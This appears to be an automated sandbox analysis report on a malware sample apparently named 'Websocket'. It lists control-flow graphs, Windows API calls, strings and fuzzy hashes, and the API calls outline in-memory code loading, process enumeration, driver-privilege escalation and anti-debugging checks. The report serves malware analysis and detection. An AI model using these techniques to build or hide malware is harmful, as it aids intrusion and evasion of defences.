                                    control_flow_graph 669 616d70-616d77 670 616d80-616d85 669->670 671 616e14-616e19 670->671 672 616d8b 670->672 673 616e1f 671->673 674 616eee-616ef3 671->674 675 616dfb-616e0f call 616cd0 672->675 676 616d8d-616d92 672->676 680 616e21-616e26 673->680 681 616e56-616e69 call 613480 673->681 682 616ef9-616f0a call 616cd0 674->682 683 616da8-616dad 674->683 675->670 678 616d94 676->678 679 616dde-616de3 676->679 685 616d96-616d9b 678->685 686 616dc8-616ddc call 616cd0 678->686 679->683 692 616de5-616df9 call 616cd0 679->692 688 616e28-616e2d 680->688 689 616e3d-616e51 call 616cd0 680->689 705 616e86-616e99 LoadLibraryW 681->705 706 616e6b-616e81 call 613e40 call 613da0 681->706 682->670 683->670 687 616daf-616db1 683->687 693 616db2-616dc6 call 616cd0 685->693 694 616d9d-616da2 685->694 686->670 688->683 695 616e33-616e38 688->695 689->670 692->670 693->670 694->683 701 616f0f-616f1a 694->701 695->670 708 616eb6-616ec1 705->708 709 616e9b-616eb1 call 613e40 call 613da0 705->709 706->705 719 616ec3-616ed9 call 613e40 call 613da0 708->719 720 616ede-616ee9 708->720 709->708 719->720 720->670
                                    APIs
                                      • Part of subcall function 00616CD0: LoadLibraryW.KERNELBASE(00000000,?,33A6B453,00616F05,?,33A6B453,006168AC), ref: 00616D00
                                    • LoadLibraryW.KERNELBASE(00000000,?,33A6B453,006168AC), ref: 00616E87
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: ;g+$;g+
                                    • API String ID: 1029625771-3974242271
                                    • Opcode ID: d3c72ccec23f4893d261341fc1dff00a732c1bc871969f1e7482b796101b9526
                                    • Instruction ID: c9ce0f1ec563a7ac194f30829bbc572a8be8fc4ea53d4688ecff0f80c278f163
                                    • Opcode Fuzzy Hash: d3c72ccec23f4893d261341fc1dff00a732c1bc871969f1e7482b796101b9526
                                    • Instruction Fuzzy Hash: 1631831CB0922087DAA8AE7DE8556FE25579F84300B2D943BF546CB3A0D934CCC297D6

                                    Control-flow Graph

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,00000008,00040000), ref: 00615B9B
                                    • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00615C0A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateFree
                                    • String ID: p^6w
                                    • API String ID: 2488874121-1797523920
                                    • Opcode ID: d2369ef7701e9273cc4d041dae5391489af07f323d1920c69017d3ebeea5d0fc
                                    • Instruction ID: e0fed74b7f3156526858a4fb734428429dccac94411a91e9041c7c5b70f91df5
                                    • Opcode Fuzzy Hash: d2369ef7701e9273cc4d041dae5391489af07f323d1920c69017d3ebeea5d0fc
                                    • Instruction Fuzzy Hash: C6118470F007105BDB94AB796C51ADA76D7AFC8750B0C843FF506CB391EA24CD424795

                                    Control-flow Graph

                                    control_flow_graph 789 60002d-60009e call 600456 * 6 802 6000a0-6000a2 789->802 803 6000a7-6000b0 789->803 804 60044e-600455 802->804 803->802 805 6000b2-6000b6 803->805 805->802 806 6000b8-6000c2 805->806 807 6000e4-600105 GetNativeSystemInfo 806->807 808 6000c4-6000c7 806->808 807->802 810 600107-60012d VirtualAlloc 807->810 809 6000c9-6000cf 808->809 811 6000d1-6000d4 809->811 812 6000d6 809->812 813 600162-60016c 810->813 814 60012f-600133 810->814 817 6000d9-6000e2 811->817 812->817 815 6001a4-6001b5 813->815 816 60016e-600173 813->816 818 600135-600138 814->818 820 600234-600240 815->820 821 6001b7-6001d1 815->821 819 600177-60018a 816->819 817->807 817->809 822 600153-600155 818->822 823 60013a-600142 818->823 824 600199-60019e 819->824 825 60018c-600193 819->825 826 6002f0-6002fa 820->826 827 600246-60025d 820->827 842 600222-60022e 821->842 843 6001d3 821->843 829 600157-60015c 822->829 823->822 828 600144-600147 823->828 824->819 834 6001a0 824->834 825->825 831 600195 825->831 832 600300-600307 826->832 833 6003b2-6003c7 call 7327b0 826->833 827->826 835 600263-600273 827->835 837 600149-60014c 828->837 838 60014e-600151 828->838 829->818 830 60015e 829->830 830->813 831->824 839 600309-600312 832->839 857 6003c9-6003ce 833->857 834->815 840 6002d5-6002e6 835->840 841 600275-600279 835->841 837->822 837->838 838->829 846 6003a7-6003ac 839->846 847 600318-600333 839->847 840->835 844 6002ec 840->844 848 60027a-600289 841->848 842->821 845 600230 842->845 849 6001d7-6001db 843->849 844->826 845->820 846->833 846->839 851 600335-600337 847->851 852 60034d-60034f 847->852 853 600291-60029a 848->853 854 60028b-60028f 848->854 855 6001fb-600204 849->855 856 6001dd 849->856 858 600340-600343 851->858 859 600339-60033e 851->859 862 600351-600353 852->862 863 600368-60036a 852->863 861 6002c3-6002c7 853->861 854->853 860 60029c-6002a1 854->860 865 600207-60021c 855->865 856->855 864 6001df-6001f9 856->864 866 6003d0-6003d4 857->866 867 60044c 857->867 871 600345-60034b 858->871 859->871 872 6002a3-6002b2 860->872 873 6002b4-6002b7 860->873 861->848 868 6002c9-6002d1 861->868 874 600355-600357 862->874 875 600359-60035b 862->875 869 600371-600376 863->869 870 60036c 863->870 864->865 865->849 880 60021e 865->880 866->867 879 6003d6-6003e0 866->879 867->804 868->840 881 600379-600380 869->881 877 60036e-60036f 870->877 871->881 872->861 873->861 876 6002b9-6002bf 873->876 874->877 875->863 878 60035d-60035f 875->878 876->861 877->881 878->881 882 600361-600366 878->882 879->867 883 6003e2-6003e6 879->883 880->842 884 600382 881->884 885 600388-60039d VirtualProtect 881->885 882->881 883->867 886 6003e8-6003f9 883->886 884->885 885->802 887 6003a3 885->887 886->867 888 6003fb-600400 886->888 887->846 889 600402-60040f 888->889 889->889 890 600411-600415 889->890 891 600417-600429 890->891 892 60042d-600433 890->892 891->888 893 60042b 891->893 892->867 894 600435-60044b 892->894 893->867 894->867
                                    APIs
                                    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,00600005), ref: 006000E9
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00600005), ref: 00600111
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637503164.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_600000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocInfoNativeSystemVirtual
                                    • String ID:
                                    • API String ID: 2032221330-0
                                    • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                    • Instruction ID: 6a056932634aca41250867a94fda34c42f8ef56db5c7f801923ae1e46585df77
                                    • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                    • Instruction Fuzzy Hash: 8FD1E171A843069FE718CF59C8807ABB3E2FF84308F18452DE8958B381E774E945CB91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph: basic-block graph for function 619a90; nodes call GetCurrentProcess, QueryFullProcessImageNameW and lstrcmpiW, plus internal subcalls 613e40 and 613da0
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,?,00000104), ref: 00619B3A
                                    • QueryFullProcessImageNameW.KERNELBASE(00000000), ref: 00619B3D
                                    • lstrcmpiW.KERNELBASE(?,?,0DFA437B,?), ref: 00619BCE
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CurrentFullImageNameQuerylstrcmpi
                                    • String ID:
                                    • API String ID: 3605714105-0
                                    • Opcode ID: 970441976f24fdcca0b2e0f19bc1c3d5d5eda8d79af472907177c8c55f135b00
                                    • Instruction ID: 4699aacc24ed5ba9a62859704b2fb74570914d950689084723e6fcac961e89ee
                                    • Opcode Fuzzy Hash: 970441976f24fdcca0b2e0f19bc1c3d5d5eda8d79af472907177c8c55f135b00
                                    • Instruction Fuzzy Hash: D131F471B143104BDB689B69A851AEB32D7ABC8750F4D442FB442CB360D974CD858BA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph: basic-block graph for function 41025b; nodes call RtlAllocateHeap, plus internal subcalls 412a79, 411e2c, 412a13, 412864 and 41257e
                                    APIs
                                    • __FF_MSGBANNER.LIBCMT ref: 00410274
                                      • Part of subcall function 00412A13: __NMSG_WRITE.LIBCMT ref: 00412A3A
                                      • Part of subcall function 00412A13: __NMSG_WRITE.LIBCMT ref: 00412A44
                                    • __NMSG_WRITE.LIBCMT ref: 0041027B
                                      • Part of subcall function 00412864: GetModuleFileNameW.KERNEL32(00000000,0041F722,00000104,00000001,00000000,?), ref: 00412900
                                      • Part of subcall function 00412864: __invoke_watson.LIBCMT ref: 00412929
                                      • Part of subcall function 00412864: _wcslen.LIBCMT ref: 0041292F
                                      • Part of subcall function 00412864: _wcslen.LIBCMT ref: 0041293C
                                      • Part of subcall function 0041257E: ___crtCorExitProcess.LIBCMT ref: 00412586
                                      • Part of subcall function 0041257E: ExitProcess.KERNEL32 ref: 0041258F
                                      • Part of subcall function 00411E2C: __getptd_noexit.LIBCMT ref: 00411E2C
                                    • RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00413CED,?,00000001,?,?,004147E0,00000018,0041BE58,0000000C,00414870), ref: 004102A0
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: ExitProcess_wcslen$AllocateFileHeapModuleName___crt__getptd_noexit__invoke_watson
                                    • String ID:
                                    • API String ID: 4285633346-0
                                    • Opcode ID: 85379f81ff0939ec83c584100c10549c30d19fa7ca46aaa6a850a0ef7457cf0a
                                    • Instruction ID: 7e8d332be424b32aeb7339ed39cdb599a77868d368d5d78e5393627917a903ca
                                    • Opcode Fuzzy Hash: 85379f81ff0939ec83c584100c10549c30d19fa7ca46aaa6a850a0ef7457cf0a
                                    • Instruction Fuzzy Hash: 7401B535244301AAE22177B6BC56BEB3748AF81378F20007BF505962E1DAFC8CD5826D
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,00000008,00000220), ref: 006131CB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID: p^6w
                                    • API String ID: 1279760036-1797523920
                                    • Opcode ID: 9cc57feeb7c3e69f2414265ec16f46ea251e3d1244b090e51a8204ab6576f9b3
                                    • Instruction ID: 1b02b47bfaf2d5286ea4a51cce5270a1a73a26dc38cca3008b6f40b43b68e92b
                                    • Opcode Fuzzy Hash: 9cc57feeb7c3e69f2414265ec16f46ea251e3d1244b090e51a8204ab6576f9b3
                                    • Instruction Fuzzy Hash: DE51C471B043118BDB58DF6894955EEBBE2ABD8340F18892EF447C7350DB30DE8A8792
                                    APIs
                                    • CreateThread.KERNELBASE(00000000,00000000,00619860,00000000,00000000,00000000,33A6B453,00616695), ref: 00619D11
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread
                                    • String ID: p^6w
                                    • API String ID: 2422867632-1797523920
                                    • Opcode ID: f84486140e83c6c7cbae18918cac13ea11ec0da0d6b002cab4877abaca9da015
                                    • Instruction ID: 4be169de99d358ef2d922bf6127ee7e8bd10c34e58ec6b9ec947573df4d06db9
                                    • Opcode Fuzzy Hash: f84486140e83c6c7cbae18918cac13ea11ec0da0d6b002cab4877abaca9da015
                                    • Instruction Fuzzy Hash: 57215E70B403005BDBA89B355D22BEA32D36B94B00F1C842FB546DF7D0EA31DD418B95
                                    APIs
                                    • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,33A6B453), ref: 0061462F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FullImageNameProcessQuery
                                    • String ID: .v
                                    • API String ID: 3578328331-2572790428
                                    • Opcode ID: c481d70da30b05dd9cc4e151c4b4effcf81ebf46755526d22e70a33a2f9e5c88
                                    • Instruction ID: e64ca5bd4abfcc58d05b6ba3d0723a688b8b691b7a89506911c33b34e0822ded
                                    • Opcode Fuzzy Hash: c481d70da30b05dd9cc4e151c4b4effcf81ebf46755526d22e70a33a2f9e5c88
                                    • Instruction Fuzzy Hash: 0101ADB1B052201BD794AB79AC01EEB669B9FC4B55B1D402EB506CB390EE34CD814390
                                    APIs
                                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 006154B1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InformationVolume
                                    • String ID: P4v
                                    • API String ID: 2039140958-1107188653
                                    • Opcode ID: 60f764c9cef8e689ef5fa71d40ea95ce8454db267e11fd7de0749888cadb22f2
                                    • Instruction ID: 7be8a3f5d72b219152b8e31b755d4e4ce4691babdb6405a4921123964f90835e
                                    • Opcode Fuzzy Hash: 60f764c9cef8e689ef5fa71d40ea95ce8454db267e11fd7de0749888cadb22f2
                                    • Instruction Fuzzy Hash: 64110C706007009BE764EB60C846BEAB3F6AF94701F9C881DA556CB2D0EBB8D9C5C756
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,00000008,00000050), ref: 00614214
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID: p^6w
                                    • API String ID: 1279760036-1797523920
                                    • Opcode ID: 847572725a331997d28623c202b283d5d8155e63dd5f59030540aa9b3d0d6e83
                                    • Instruction ID: 69c71e376edb4998587d9fa95d3ee63163a35d2910d60dbbcb641e36d1b79ebd
                                    • Opcode Fuzzy Hash: 847572725a331997d28623c202b283d5d8155e63dd5f59030540aa9b3d0d6e83
                                    • Instruction Fuzzy Hash: 8FE03021F403505B9B94A7B9A8459EE26A76FC8B0074C842BB405CB390EE348D424B91
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0040EC7E
                                    Strings
                                    • tGeKa2B%k9F<3!6T*a>U%*s(fc>&tKC@3cQGhibVLni4I3u>F, xrefs: 0040EC93
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: tGeKa2B%k9F<3!6T*a>U%*s(fc>&tKC@3cQGhibVLni4I3u>F
                                    • API String ID: 4275171209-1198268820
                                    • Opcode ID: 3b538efd8d0877daca6c9ed735cc7399334d432909fa35e9c6d7cd521d04529b
                                    • Instruction ID: 01d0f4e730c09718d0011088008fc3b8b73f4a900f8981e618274441f709c89d
                                    • Opcode Fuzzy Hash: 3b538efd8d0877daca6c9ed735cc7399334d432909fa35e9c6d7cd521d04529b
                                    • Instruction Fuzzy Hash: 9EF046B5A846203BF22157258C0AFAF7E68CB84B50F544528FE046A2C0D7B89A0182DE
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637741644.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_731000_Websocket.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 75a1b7a7a6438216b2186a6c390a153a86880d5073630250062985e5924fd960
                                    • Instruction ID: c2e5a26e3691d19ce010ec0e9767793a4364f0c0a84ba09c837aca7d76225502
                                    • Opcode Fuzzy Hash: 75a1b7a7a6438216b2186a6c390a153a86880d5073630250062985e5924fd960
                                    • Instruction Fuzzy Hash: 7A419774A10109AFEB04CF54C494BAAB7B2FB88314F64C199E8195F356C779EE82CB80
                                    APIs
                                    • LoadLibraryW.KERNELBASE(00000000,?,33A6B453,00616F05,?,33A6B453,006168AC), ref: 00616D00
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: aeeb888ef0dc69756414754748205e5a0b49ecf6f37ee8a4fdc93afb2f94b495
                                    • Instruction ID: eb862305534769d921f1bac1307ecd5018e250b7f9702cb7f0b398ee91163df2
                                    • Opcode Fuzzy Hash: aeeb888ef0dc69756414754748205e5a0b49ecf6f37ee8a4fdc93afb2f94b495
                                    • Instruction Fuzzy Hash: 8E014F34B003504BC794AB79A851AEB36E7AFC460070C842FB506CB3A1EA34DD424B94
                                    APIs
                                    • FindFirstChangeNotificationW.KERNELBASE(?,00000000,00000001), ref: 006198DB
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ChangeFindFirstNotification
                                    • String ID:
                                    • API String ID: 1065410024-0
                                    • Opcode ID: 874f0bae95bec1eacc342eb46230d74d4bbd7d8ee1198fa0ef0d72ce5cd718d4
                                    • Instruction ID: ea092e2bf288304ba1f8e9a653069d6894e7ba570bca7b9fdc6ebc92381600af
                                    • Opcode Fuzzy Hash: 874f0bae95bec1eacc342eb46230d74d4bbd7d8ee1198fa0ef0d72ce5cd718d4
                                    • Instruction Fuzzy Hash: 68018630A0034597CBB8DB7558A6BEA32A7AB98740F1C4C1EF946C7360EB35CDC19766
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00614C02
                                    • Process32FirstW.KERNEL32(?,0000022C), ref: 00614C60
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFirstProcess32SnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 2353314856-0
                                    • Opcode ID: 44ad3fc9c473b854154963280b1e704f359749fec1c3a65bab715e04b1f45a1f
                                    • Instruction ID: b76c77aef2f8355c55b1e7c5f4625b6008d818d886863aeeb348a7811734cb22
                                    • Opcode Fuzzy Hash: 44ad3fc9c473b854154963280b1e704f359749fec1c3a65bab715e04b1f45a1f
                                    • Instruction Fuzzy Hash: 04F09B7071525057D678667C588B7F912835745710F2C491AE555E73F0FE31DCC187D1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637741644.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_731000_Websocket.jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: 51878fb2a1c5fb1b7f3aa0b0adae3dc0b55a3c72d4b2339b61c58abb1e390c61
                                    • Instruction ID: 4124ca63550c8d03ab08021d43678982b5f26220f8300b8477ff51e15decb775
                                    • Opcode Fuzzy Hash: 51878fb2a1c5fb1b7f3aa0b0adae3dc0b55a3c72d4b2339b61c58abb1e390c61
                                    • Instruction Fuzzy Hash: 7DD09EB4D40208FFE748EFA4DA4AB5DBBB4EB04706F508165E90497281E7746B44CB56
                                    APIs
                                    • VirtualFree.KERNELBASE(?,?,?), ref: 0073182F
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637741644.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_731000_Websocket.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-0
                                    • Opcode ID: edd2763ed153eaf6052808db2e01758c8a1b456fd169d7e3e9ac4fe4ebab5eab
                                    • Instruction ID: 6057d2d6f7e46738dfa9a77c2a25436fbfb7f671643b38d211c6f5ff6480ba0a
                                    • Opcode Fuzzy Hash: edd2763ed153eaf6052808db2e01758c8a1b456fd169d7e3e9ac4fe4ebab5eab
                                    • Instruction Fuzzy Hash: BFC04C7A11420CAB8B04DF98EC84DAB37ADBB8C611B04C508BA1D87200C634F9108BA5
                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 0040E22E
                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040E23B
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeLoadDriverPrivilege,?), ref: 0040E24D
                                    • AdjustTokenPrivileges.ADVAPI32 ref: 0040E28B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                    • String ID: SeLoadDriverPrivilege
                                    • API String ID: 2349140579-497486668
                                    • Opcode ID: cffa3139d4f1966d0e1b8d4b561fce07a712f7e5228b86654aafc6df663748c5
                                    • Instruction ID: 6ea790c7a31b1ba1ad77907437152988263291b3601ce40a83fb03ebe5ecb5a6
                                    • Opcode Fuzzy Hash: cffa3139d4f1966d0e1b8d4b561fce07a712f7e5228b86654aafc6df663748c5
                                    • Instruction Fuzzy Hash: D301DAB4548301AFD704DF50C999F9BBBE4AB8CB08F40891DF58A862A0E774E948CB56
                                    APIs
                                    • IsDebuggerPresent.KERNEL32 ref: 0041212A
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041213F
                                    • UnhandledExceptionFilter.KERNEL32(0041989C), ref: 0041214A
                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00412166
                                    • TerminateProcess.KERNEL32(00000000), ref: 0041216D
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                    • String ID:
                                    • API String ID: 2579439406-0
                                    • Opcode ID: 6f2c9a2ca4667ff0c482e712aad0c8141d9414460f1110707eeb279986343969
                                    • Instruction ID: b5dc470c48336d2cad9fc5f7ad5caf64c585ac90b15cfe1187e4ee1c5b5d9eed
                                    • Opcode Fuzzy Hash: 6f2c9a2ca4667ff0c482e712aad0c8141d9414460f1110707eeb279986343969
                                    • Instruction Fuzzy Hash: 8C21DBB4911204EFD700DF69EC896C63BB4BB6C315F50803AE90A87372E7B4598A8F1D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: l
                                    • API String ID: 0-2517025534
                                    • Opcode ID: b540197c04a4096c67bc52c6181e49dc103387498643872b5df22096f0c2060f
                                    • Instruction ID: be33586da93aa639825344dfbc8d9ed1cfe7aa8acb0ac371483907cf1c7f3d96
